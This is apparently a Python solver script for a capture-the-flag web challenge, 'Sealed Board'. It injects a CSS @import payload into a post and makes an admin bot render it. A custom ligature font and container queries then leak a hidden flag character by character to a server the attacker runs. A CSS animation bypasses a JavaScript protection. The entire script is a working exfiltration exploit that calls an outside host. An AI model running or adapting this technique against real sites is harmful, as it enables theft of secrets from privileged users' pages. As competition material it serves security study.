|
#!/usr/bin/env python3 |
|
""" |
|
Sealed Board solver. |
|
|
|
Requirements: |
|
pip install requests fonttools |
|
|
|
Usage example: |
|
python3 solver.py \ |
|
--web-base http://TARGET:5000 \ |
|
--bot-base http://TARGET:5001 \ |
|
--public-base http://YOUR-HOST:8000 \ |
|
--listen-host 0.0.0.0 \ |
|
--listen-port 8000 |
|
|
|
`public-base` must be reachable by the admin bot. |
|
""" |
|
|
|
from __future__ import annotations |
|
|
|
import argparse |
|
import base64 |
|
import json |
|
import random |
|
import string |
|
import threading |
|
import time |
|
import urllib.parse |
|
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer |
|
from typing import Dict, Optional |
|
|
|
import requests |
|
from fontTools.feaLib.builder import addOpenTypeFeaturesFromString |
|
from fontTools.fontBuilder import FontBuilder |
|
from fontTools.pens.ttGlyphPen import TTGlyphPen |
|
|
|
|
|
DEFAULT_PREFIX = "codegate{" |
|
DEFAULT_ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_-}" |
|
|
|
|
|
def rand_text(n: int = 8) -> str: |
|
return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n)) |
|
|
|
|
|
def css_escape_url(url: str) -> str: |
|
out = [] |
|
for ch in url: |
|
if ch in ":/@": |
|
out.append(f"\\{ord(ch):06x} ") |
|
elif ch == "/": |
|
out.append("\\00002f ") |
|
else: |
|
out.append(ch) |
|
return "".join(out) |
|
|
|
|
|
def empty_glyph(): |
|
return TTGlyphPen(None).glyph() |
|
|
|
|
|
def glyph_name_for_char(ch: str) -> str: |
|
return f"u{ord(ch):04X}" |
|
|
|
|
|
def lig_name(idx: int) -> str: |
|
return f"lig{idx:02d}" |
|
|
|
|
|
def build_probe_font(prefix: str, alphabet: str, units_per_em: int = 1000) -> bytes: |
|
# Include all printable ASCII so the browser never falls back to a |
|
# system font (which would add unexpected width). |
|
all_printable = sorted(set(chr(i) for i in range(32, 127)) | set(prefix) | set(alphabet)) |
|
charset = all_printable |
|
|
|
# Two-phase ligature approach (like fontleak): |
|
# Phase 1: prefix_chars → intermediate glyph "imid" |
|
# Phase 2: imid + char → leak glyph with encoded width |
|
# This avoids a single ligature rule with 15+ glyphs which may exceed |
|
# OpenType engine limits in some browsers. |
|
|
|
# Calculate how many intermediate glyphs we need for chunked prefix stripping |
|
CHUNK_SIZE = 4 |
|
num_mid_glyphs = max(1, (len(prefix) + CHUNK_SIZE - 1) // CHUNK_SIZE) |
|
|
|
glyph_order = [".notdef"] |
|
glyph_order.extend(glyph_name_for_char(ch) for ch in charset) |
|
glyph_order.extend(f"mid_{i}" for i in range(num_mid_glyphs)) |
|
glyph_order.extend(lig_name(i) for i, _ in enumerate(alphabet)) |
|
|
|
fb = FontBuilder(units_per_em, isTTF=True) |
|
fb.setupGlyphOrder(glyph_order) |
|
|
|
cmap: Dict[int, str] = {ord(ch): glyph_name_for_char(ch) for ch in charset} |
|
glyphs = {name: empty_glyph() for name in glyph_order} |
|
|
|
# Every regular character gets advance width 0. |
|
metrics = {".notdef": (0, 0)} |
|
for ch in charset: |
|
metrics[glyph_name_for_char(ch)] = (0, 0) |
|
for i in range(num_mid_glyphs): |
|
metrics[f"mid_{i}"] = (0, 0) |
|
|
|
# Ligature glyph for alphabet[idx] gets advance width (idx + 1). |
|
# At font-size 1000px with units-per-em 1000, 1 unit = 1 pixel. |
|
for idx, _ in enumerate(alphabet): |
|
metrics[lig_name(idx)] = (idx + 1, 0) |
|
|
|
fb.setupCharacterMap(cmap) |
|
fb.setupGlyf(glyphs) |
|
fb.setupHorizontalMetrics(metrics) |
|
fb.setupHorizontalHeader(ascent=5, descent=-5) |
|
fb.setupOS2( |
|
sTypoAscender=5, |
|
sTypoDescender=-5, |
|
usWinAscent=5, |
|
usWinDescent=5, |
|
) |
|
fb.setupNameTable( |
|
{ |
|
"familyName": "sealed-board-probe", |
|
"styleName": "Regular", |
|
"fullName": "sealed-board-probe Regular", |
|
"psName": "sealed-board-probe-Regular", |
|
} |
|
) |
|
fb.setupPost() |
|
fb.setupMaxp() |
|
|
|
# Multi-phase ligature rules to avoid long sequences that exceed |
|
# HarfBuzz's ligature component limit in some browsers: |
|
# |
|
# Phase 1..N: chunk the prefix into groups of CHUNK_SIZE chars and |
|
# chain-reduce them: mid_{k-1} + chunk_chars → mid_k |
|
# (first chunk starts from raw chars, no mid_ prefix) |
|
# Final phase: mid_last + next_char → lig_XX (width-encoded) |
|
CHUNK_SIZE = 4 |
|
|
|
fea_lines = ["languagesystem DFLT dflt;"] |
|
|
|
prefix_chars = list(prefix) |
|
# Split prefix into chunks |
|
chunks = [] |
|
for i in range(0, len(prefix_chars), CHUNK_SIZE): |
|
chunks.append(prefix_chars[i : i + CHUNK_SIZE]) |
|
|
|
lookup_names = [] |
|
for ci, chunk in enumerate(chunks): |
|
lname = f"strip_{ci}" |
|
lookup_names.append(lname) |
|
fea_lines.append(f"lookup {lname} {{") |
|
if ci == 0: |
|
# First chunk: raw chars → mid_0 |
|
seq = " ".join(glyph_name_for_char(c) for c in chunk) |
|
fea_lines.append(f" sub {seq} by mid_{ci};") |
|
else: |
|
# Subsequent chunks: mid_{ci-1} + chunk_chars → mid_{ci} |
|
seq = " ".join(glyph_name_for_char(c) for c in chunk) |
|
fea_lines.append(f" sub mid_{ci - 1} {seq} by mid_{ci};") |
|
fea_lines.append(f"}} {lname};") |
|
|
|
last_mid = f"mid_{len(chunks) - 1}" |
|
|
|
# Final phase: last_mid + next_char → leak glyph |
|
fea_lines.append("lookup detect_char {") |
|
for idx, ch in enumerate(alphabet): |
|
fea_lines.append(f" sub {last_mid} {glyph_name_for_char(ch)} by {lig_name(idx)};") |
|
fea_lines.append("} detect_char;") |
|
lookup_names.append("detect_char") |
|
|
|
# Register all lookups under liga feature in order |
|
fea_lines.append("feature liga {") |
|
for lname in lookup_names: |
|
fea_lines.append(f" lookup {lname};") |
|
fea_lines.append("} liga;") |
|
|
|
addOpenTypeFeaturesFromString(fb.font, "\n".join(fea_lines)) |
|
|
|
from io import BytesIO |
|
|
|
bio = BytesIO() |
|
fb.save(bio) |
|
return bio.getvalue() |
|
|
|
|
|
class LeakState: |
|
def __init__(self, public_base: str, alphabet: str): |
|
self.public_base = public_base.rstrip("/") |
|
self.alphabet = alphabet |
|
self.lock = threading.Lock() |
|
self.event = threading.Event() |
|
self.stage_event = threading.Event() |
|
self.current_token = "" |
|
self.current_prefix = "" |
|
self.current_hit: Optional[str] = None |
|
|
|
def set_round(self, prefix: str, token: str): |
|
with self.lock: |
|
self.current_prefix = prefix |
|
self.current_token = token |
|
self.current_hit = None |
|
self.event.clear() |
|
self.stage_event.clear() |
|
|
|
def hit(self, token: str, ch: str): |
|
with self.lock: |
|
if token != self.current_token: |
|
return |
|
if ch == "_stage": |
|
self.stage_event.set() |
|
return |
|
if ch not in self.alphabet or self.current_hit is not None: |
|
return |
|
self.current_hit = ch |
|
self.event.set() |
|
|
|
def get_hit(self) -> Optional[str]: |
|
with self.lock: |
|
return self.current_hit |
|
|
|
def build_stage_css(self, token: str) -> bytes: |
|
with self.lock: |
|
prefix = self.current_prefix |
|
alphabet = self.alphabet |
|
|
|
alphabet_size = len(alphabet) |
|
# Grid width: alphabet_size + 2 pixels. |
|
# Flag glyph width = (idx + 1) px => hero-card width = html_w - (idx + 1). |
|
html_width = alphabet_size + 2 |
|
|
|
# Inline the font as base64 so it's available immediately when CSS is |
|
# parsed — no extra network round-trip that could lose the race against |
|
# the JS flag protection. |
|
font_bytes = build_probe_font(prefix, alphabet) |
|
font_b64 = base64.b64encode(font_bytes).decode() |
|
probe_url = f"{self.public_base}/hit?token={urllib.parse.quote(token)}&ch=_stage" |
|
|
|
css = f""" |
|
@font-face {{ |
|
font-family: probe; |
|
src: url('data:font/truetype;base64,{font_b64}') format('truetype'); |
|
}} |
|
html {{ |
|
background-image: url('{probe_url}'); |
|
background-repeat: no-repeat; |
|
}} |
|
|
|
/* ---- layout: #page = fixed-width grid, hero-card | flag side by side ---- */ |
|
|
|
#page {{ |
|
container-type: normal !important; |
|
container-name: none !important; |
|
display: grid !important; |
|
grid-template-columns: 1fr auto; |
|
width: {html_width}px !important; |
|
max-width: none !important; |
|
min-width: 0 !important; |
|
padding: 0 !important; |
|
margin: 0 !important; |
|
border: 0 !important; |
|
position: absolute !important; |
|
top: 0 !important; |
|
left: 0 !important; |
|
animation: cv-toggle 200ms infinite steps(1, end); |
|
}} |
|
|
|
.site-header {{ display: none !important; }} |
|
.feed {{ display: none !important; }} |
|
|
|
/* ---- hero-card = measurement container (gets remaining 1fr width) ---- */ |
|
|
|
.hero-card {{ |
|
grid-row: 1; |
|
grid-column: 1; |
|
container-type: inline-size !important; |
|
container-name: leak !important; |
|
overflow: hidden !important; |
|
min-width: 0 !important; |
|
max-width: none !important; |
|
padding: 0 !important; |
|
margin: 0 !important; |
|
border: 0 !important; |
|
box-shadow: none !important; |
|
background: none !important; |
|
height: 1px !important; |
|
position: relative !important; |
|
}} |
|
.hero-card > * {{ display: none !important; }} |
|
.hero-card::before {{ |
|
display: block !important; |
|
content: "" !important; |
|
width: 0 !important; |
|
height: 0 !important; |
|
position: absolute !important; |
|
}} |
|
|
|
/* ---- #flag = ligature-font target (auto-sized column) ---- */ |
|
|
|
#flag {{ |
|
grid-row: 1; |
|
grid-column: 2; |
|
display: inline-block !important; |
|
font-family: probe !important; |
|
font-size: 1000px !important; |
|
width: fit-content !important; |
|
overflow: hidden !important; |
|
white-space: nowrap !important; |
|
letter-spacing: 0 !important; |
|
word-spacing: 0 !important; |
|
line-height: 0 !important; |
|
padding: 0 !important; |
|
margin: 0 !important; |
|
border: 0 !important; |
|
min-width: 0 !important; |
|
height: 0 !important; |
|
font-feature-settings: "liga" on !important; |
|
}} |
|
|
|
/* ---- content-visibility animation to bypass JS flag protection ---- |
|
* |
|
* hidden phase : checkVisibility() = false => JS restores flag text |
|
* visible phase : layout computed => container queries fire => URL fetched |
|
* |
|
* The visible window (~20 ms) is longer than one frame at 60 fps (16.67 ms) |
|
* so at least one rendering frame is guaranteed. |
|
*/ |
|
|
|
@keyframes cv-toggle {{ |
|
0% {{ content-visibility: hidden; }} |
|
90% {{ content-visibility: hidden; }} |
|
91% {{ content-visibility: visible; }} |
|
100% {{ content-visibility: visible; }} |
|
}} |
|
""" |
|
|
|
# Container queries: hero-card width = html_width - (idx + 1) |
|
for idx, ch in enumerate(alphabet): |
|
hero_w = html_width - idx - 1 |
|
hit_url = ( |
|
f"{self.public_base}/hit" |
|
f"?token={urllib.parse.quote(token)}&ch={urllib.parse.quote(ch)}" |
|
) |
|
css += f"""@container leak (width: {hero_w}px) {{ |
|
.hero-card::before {{ |
|
content: url('{hit_url}') !important; |
|
}} |
|
}} |
|
""" |
|
|
|
return css.encode("utf-8") |
|
|
|
def build_font(self) -> bytes: |
|
with self.lock: |
|
prefix = self.current_prefix |
|
alphabet = self.alphabet |
|
return build_probe_font(prefix, alphabet) |
|
|
|
|
|
class LeakHandler(BaseHTTPRequestHandler): |
|
server_version = "SealedBoardLeak/1.0" |
|
|
|
def do_GET(self): |
|
parsed = urllib.parse.urlparse(self.path) |
|
query = urllib.parse.parse_qs(parsed.query) |
|
state: LeakState = self.server.state # type: ignore[attr-defined] |
|
|
|
if parsed.path == "/stage.css": |
|
token = query.get("token", [""])[0] |
|
print(f"[*] stage.css token={token}") |
|
body = state.build_stage_css(token) |
|
self.send_response(200) |
|
self.send_header("Content-Type", "text/css; charset=utf-8") |
|
self.send_header("Cache-Control", "no-store") |
|
self.send_header("Access-Control-Allow-Origin", "*") |
|
self.send_header("Content-Length", str(len(body))) |
|
self.end_headers() |
|
self.wfile.write(body) |
|
return |
|
|
|
if parsed.path == "/font.ttf": |
|
token = query.get("token", [""])[0] |
|
print(f"[*] font.ttf token={token}") |
|
body = state.build_font() |
|
self.send_response(200) |
|
self.send_header("Content-Type", "font/ttf") |
|
self.send_header("Cache-Control", "no-store") |
|
self.send_header("Access-Control-Allow-Origin", "*") |
|
self.send_header("Content-Length", str(len(body))) |
|
self.end_headers() |
|
self.wfile.write(body) |
|
return |
|
|
|
if parsed.path == "/hit": |
|
token = query.get("token", [""])[0] |
|
ch = query.get("ch", [""])[0] |
|
if ch: |
|
print(f"[+] hit token={token} ch={ch}") |
|
state.hit(token, ch) |
|
self.send_response(204) |
|
self.send_header("Cache-Control", "no-store") |
|
self.end_headers() |
|
return |
|
|
|
if parsed.path == "/healthz": |
|
body = b"ok" |
|
self.send_response(200) |
|
self.send_header("Content-Type", "text/plain; charset=utf-8") |
|
self.send_header("Content-Length", str(len(body))) |
|
self.end_headers() |
|
self.wfile.write(body) |
|
return |
|
|
|
self.send_response(404) |
|
self.end_headers() |
|
|
|
def log_message(self, fmt: str, *args): |
|
return |
|
|
|
|
|
def start_server(listen_host: str, listen_port: int, state: LeakState) -> ThreadingHTTPServer: |
|
httpd = ThreadingHTTPServer((listen_host, listen_port), LeakHandler) |
|
httpd.state = state # type: ignore[attr-defined] |
|
thread = threading.Thread(target=httpd.serve_forever, daemon=True) |
|
thread.start() |
|
return httpd |
|
|
|
|
|
class Solver: |
|
def __init__(self, args: argparse.Namespace): |
|
self.args = args |
|
self.web = args.web_base.rstrip("/") |
|
self.bot = args.bot_base.rstrip("/") |
|
self.public_base = args.public_base.rstrip("/") |
|
self.state = LeakState(self.public_base, args.alphabet) |
|
self.session = requests.Session() |
|
self.username = f"u_{rand_text(10)}" |
|
self.password = f"p_{rand_text(16)}" |
|
self.post_id: Optional[int] = None |
|
self.manual = args.manual |
|
|
|
def _json(self, resp: requests.Response) -> Dict: |
|
data = resp.json() |
|
if not isinstance(data, dict): |
|
raise RuntimeError(f"unexpected JSON: {data!r}") |
|
return data |
|
|
|
def register(self): |
|
resp = self.session.post( |
|
f"{self.web}/register", |
|
json={"username": self.username, "password": self.password}, |
|
timeout=10, |
|
) |
|
if resp.status_code != 200: |
|
raise RuntimeError(f"register failed: {resp.status_code} {resp.text}") |
|
data = self._json(resp) |
|
if not data.get("ok"): |
|
raise RuntimeError(f"register failed: {data}") |
|
print(f"[+] registered {self.username}") |
|
|
|
def upsert_post(self, token: str): |
|
import_url = f"{self.public_base}/stage.css?token={urllib.parse.quote(token)}" |
|
payload = f'<style>@import "{css_escape_url(import_url)}";</style>' |
|
if self.post_id is None: |
|
resp = self.session.post( |
|
f"{self.web}/post", |
|
json={"post": payload}, |
|
timeout=10, |
|
) |
|
if resp.status_code != 200: |
|
raise RuntimeError(f"post create failed: {resp.status_code} {resp.text}") |
|
data = self._json(resp) |
|
if not data.get("ok") or "post" not in data: |
|
raise RuntimeError(f"post create failed: {data}") |
|
self.post_id = int(data["post"]["id"]) |
|
print(f"[+] created post #{self.post_id}") |
|
return |
|
|
|
resp = self.session.put( |
|
f"{self.web}/post/{self.post_id}", |
|
json={"post": payload}, |
|
timeout=10, |
|
) |
|
if resp.status_code != 200: |
|
raise RuntimeError(f"post update failed: {resp.status_code} {resp.text}") |
|
data = self._json(resp) |
|
if not data.get("ok"): |
|
raise RuntimeError(f"post update failed: {data}") |
|
|
|
def queue_admin(self) -> Dict: |
|
if self.manual: |
|
print(f"visit {self.web}/post/{self.post_id} in the admin interface") |
|
return {} |
|
if self.post_id is None: |
|
raise RuntimeError("post_id is missing") |
|
resp = requests.post( |
|
f"{self.bot}/visit", |
|
json={"url": f"/post/{self.post_id}"}, |
|
timeout=10, |
|
) |
|
if resp.status_code not in (200, 202): |
|
raise RuntimeError(f"admin queue failed: {resp.status_code} {resp.text}") |
|
data = self._json(resp) |
|
if data.get("status") == "error": |
|
raise RuntimeError(f"admin queue failed: {data}") |
|
return data |
|
|
|
def poll_job(self, job_id: str, timeout: float = 30.0): |
|
deadline = time.time() + timeout |
|
while time.time() < deadline: |
|
resp = requests.get(f"{self.bot}/visit/{job_id}", timeout=10) |
|
data = self._json(resp) |
|
status = data.get("status") |
|
if status in {"ok", "error"}: |
|
return data |
|
time.sleep(0.5) |
|
return None |
|
|
|
def leak_one(self, prefix: str) -> str: |
|
token = rand_text(12) |
|
self.state.set_round(prefix, token) |
|
self.upsert_post(token) |
|
job = self.queue_admin() |
|
job_id = str(job.get("job_id", "")) |
|
print(f"[*] probing prefix={prefix!r} job={job_id}") |
|
|
|
if not self.state.stage_event.wait(timeout=self.args.stage_timeout): |
|
print(f"[!] stage fetch not observed within timeout for prefix={prefix!r}") |
|
|
|
if not self.state.event.wait(timeout=self.args.hit_timeout): |
|
job_data = self.poll_job(job_id, timeout=15.0) if job_id else None |
|
raise RuntimeError(f"no hit for prefix {prefix!r}; job={job_data}") |
|
|
|
ch = self.state.get_hit() |
|
if not ch: |
|
raise RuntimeError(f"empty hit for prefix {prefix!r}") |
|
if job_id: |
|
self.poll_job(job_id, timeout=20.0) |
|
print(f"[+] matched next char: {ch!r}") |
|
return ch |
|
|
|
def run(self): |
|
start_server(self.args.listen_host, self.args.listen_port, self.state) |
|
print(f"[+] leak server on {self.args.listen_host}:{self.args.listen_port}") |
|
print(f"[+] public base {self.public_base}") |
|
|
|
self.register() |
|
|
|
flag = self.args.prefix |
|
while not flag.endswith("}"): |
|
ch = self.leak_one(flag) |
|
flag += ch |
|
print(f"[+] flag so far: {flag}") |
|
print(f"[+] final flag: {flag}") |
|
|
|
|
|
def parse_args() -> argparse.Namespace: |
|
parser = argparse.ArgumentParser() |
|
parser.add_argument("--web-base", required=True, help="challenge web base URL") |
|
parser.add_argument("--bot-base", required=True, help="challenge adminbot base URL") |
|
parser.add_argument( |
|
"--public-base", |
|
required=True, |
|
help="attacker-controlled base URL reachable by the admin bot", |
|
) |
|
parser.add_argument("--listen-host", default="0.0.0.0") |
|
parser.add_argument("--listen-port", default=8000, type=int) |
|
parser.add_argument("--prefix", default=DEFAULT_PREFIX) |
|
parser.add_argument("--alphabet", default=DEFAULT_ALPHABET) |
|
parser.add_argument("--hit-timeout", default=15.0, type=float) |
|
parser.add_argument("--stage-timeout", default=60.0, type=float) |
|
parser.add_argument("--manual", default=False, type=bool) |
|
return parser.parse_args() |
|
|
|
|
|
def main(): |
|
args = parse_args() |
|
solver = Solver(args) |
|
solver.run() |
|
|
|
|
|
if __name__ == "__main__": |
|
main() |